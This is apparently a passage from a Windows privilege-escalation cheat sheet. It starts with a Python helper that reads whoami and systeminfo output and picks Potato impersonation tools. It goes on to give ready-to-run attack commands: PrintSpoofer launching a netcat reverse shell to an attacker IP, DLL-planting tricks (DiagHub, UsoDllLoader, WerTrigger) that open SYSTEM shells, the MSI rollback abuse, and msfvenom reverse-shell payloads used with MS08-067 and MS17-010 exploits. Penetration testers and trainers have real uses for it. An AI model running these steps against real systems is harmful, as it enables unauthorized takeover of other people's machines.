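    """Impersonation-privilege escalation tools by OS build, as the page advises."""
    if build >= ROGUE_POTATO_MIN_BUILD:
        return ["RoguePotato", "PrintSpoofer", "EfsPotato"]
    return ["JuicyPotato", "RottenPotato"]


def assess(whoami_output: str, systeminfo_output: str) -> dict:
    """Combine both outputs into: held dangerous privileges and the suggested tool family."""
    held = parse_whoami_priv(whoami_output)
    findings = [(p, held[p], *DANGEROUS_PRIVILEGES[p]) for p in DANGEROUS_PRIVILEGES if p in held]
    build = build_from_systeminfo(systeminfo_output)
    can_impersonate = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"} & held.keys()
    return {
        "build": build,
        "findings": findings,
        "potato": potato_choice(build) if can_impersonate and build else [],
    }


# Constructed sample outputs (typical IIS application-pool identity on Server 2019).
SAMPLE_WHOAMI = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""
SAMPLE_SYSTEMINFO = """
Host Name:                 WEB01
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
"""

if __name__ == "__main__":
    result = assess(SAMPLE_WHOAMI, SAMPLE_SYSTEMINFO)
    print("build:", result["build"])
    for priv, state, impact, how in result["findings"]:
        print(f"  {priv} ({state}) -> {impact}: {how}")
    print("try:", ", ".join(result["potato"]) or "no impersonation privilege held")
```

On the sample the two impersonation privileges are reported (one of them Disabled, which is fine) and, because the build is 17763, the suggestion is RoguePotato / PrintSpoofer / EfsPotato rather than JuicyPotato.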
EFSPotato (MS-EFSR EfsRpcOpenFileRaw)
Binary available at https://github.com/zcgonvh/EfsPotato
PrintSpoofer
Binary available at https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0
```powershell
# run nc -lnvp 443 on the attacking machine, then:
.\PrintSpoofer64.exe -c "C:\Temp\nc64.exe 192.168.45.171 443 -e cmd"
# without a listener: interactive SYSTEM shell in the current console
.\PrintSpoofer64.exe -i -c cmd
# Via RDP: spawn the process on the desktop of session 3
.\PrintSpoofer64.exe -d 3 -c "powershell -ep bypass"
```
EoP - Privileged File Write
DiagHub
The Microsoft Diagnostics Hub Standard Collector Service (DiagHub) collects trace information and is programmatically exposed via DCOM. This DCOM object can be used to load a DLL into a SYSTEM process, provided that the DLL exists in the C:\Windows\System32 directory, which is why it pairs with a privileged file write primitive. Starting with Windows 10 version 1903, DiagHub can no longer be used to load arbitrary DLLs.
Exploit
Create an evil DLL, e.g. payload.dll, and move it into C:\Windows\System32
Build https://github.com/xct/diaghub
```powershell
diaghub.exe c:\\ProgramData\\ payload.dll
```
The default payload will run C:\Windows\System32\spool\drivers\color\nc.exe -lvp 2000 -e cmd.exe
An alternative to the DiagHub DLL loading "exploit" found by James Forshaw (a.k.a. @tiraniddo).
If we find a privileged file write vulnerability in Windows or in some third-party software, we can copy our own version of windowscoredeviceinfo.dll into C:\Windows\System32\ and then have it loaded by the USO (Update Session Orchestrator) service to get arbitrary code execution as NT AUTHORITY\SYSTEM. 2020-06-06 update: this trick no longer works on the latest builds of Windows 10 Insider Preview.
Exploit
Build https://github.com/itm4n/UsoDllLoader
Select the Release config and x64 architecture.
Build the solution.
DLL: .\x64\Release\WindowsCoreDeviceInfo.dll
Loader: .\x64\Release\UsoDllLoader.exe
Copy WindowsCoreDeviceInfo.dll to C:\Windows\System32\
Use the loader and wait for the shell, or run usoclient StartInteractiveScan and connect to the bind shell on port 1337.
WerTrigger
Exploit Privileged File Writes bugs with Windows Problem Reporting
Clone https://github.com/sailay1996/WerTrigger
Copy phoneinfo.dll to C:\Windows\System32\
Place Report.wer file and WerTrigger.exe in a same directory.
Then, run WerTrigger.exe.
Enjoy a shell as NT AUTHORITY\SYSTEM
WerMgr
Exploit Privileged Directory Creation Bugs with Windows Error Reporting
Grant access to it:
```powershell
cacls C:\Windows\System32\wermgr.exe.local /e /g everyone:f
```
Place spawn.dll file and dircreate2system.exe in a same directory and run .\dircreate2system.exe.
Enjoy a shell as NT AUTHORITY\SYSTEM
EoP - Privileged File Delete
During an MSI installation, the Windows Installer service keeps a record of every change in case it needs to be rolled back. To do that it creates:
- a folder at C:\Config.Msi containing
- a rollback script (.rbs)
- a rollback file (.rbf)
To convert a privileged file delete into a local privilege escalation, abuse the Windows Installer service:
- delete the protected C:\Config.Msi folder immediately after the Windows Installer creates it
- recreate the C:\Config.Msi folder with a weak DACL, which works because ordinary users are allowed to create folders at the root of C:\
- drop malicious .rbs and .rbf files into it, to be consumed by the MSI rollback
- upon rollback, Windows Installer then applies the attacker-controlled changes to the system as SYSTEM
The easiest way to trigger this chain is thezdi/FilesystemEoPs (FolderOrFileDeleteToSystem). The exploit contains a .msi file with 2 actions: the first produces a delay and the second throws an error to force a rollback. This rollback will "restore" a malicious HID.dll in C:\Program Files\Common Files\microsoft shared\ink\HID.dll.
Then switch to the secure desktop using [CTRL]+[ALT]+[DELETE] and open the On-Screen Keyboard (osk.exe). The osk.exe process looks for C:\Program Files\Common Files\microsoft shared\ink\HID.dll before C:\Windows\System32\HID.dll, so the planted DLL is loaded into a process running as SYSTEM.
Detailed information about the vulnerability: https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege
EoP - Common Vulnerabilities and Exposures
MS08-067 (NetAPI)
Check the vulnerability with the nmap smb-vuln-ms08-067 script.
If you can't use Metasploit and only want a reverse shell.
```bash
# https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py
# generate the shellcode (bad chars from the exploit) and paste it into the script
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows

# Usage: MS08_067_2018.py <target> <os id> <port>
Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445
Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)
Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal
Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English
Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)
Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)
Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)

python ms08-067.py 10.0.0.1 6 445
```
MS10-015 (KiTrap0D) - Microsoft Windows NT/2000/2003/2008/XP/Vista/7
'KiTrap0D' User Mode to Ring Escalation (MS10-015)
Metasploit modules to exploit EternalRomance/EternalSynergy/EternalChampion.
```
auxiliary/admin/smb/ms17_010_command          MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
auxiliary/scanner/smb/smb_ms17_010            MS17-010 SMB RCE Detection
exploit/windows/smb/ms17_010_eternalblue      MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
exploit/windows/smb/ms17_010_eternalblue_win8 MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
exploit/windows/smb/ms17_010_psexec           MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
```
If you can't use Metasploit and only want a reverse shell.
```bash
git clone https://github.com/helviojunior/MS17-010
# generate a simple reverse shell to use
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o revshell.exe
python2 send_and_execute.py 10.0.0.1 revshell.exe
```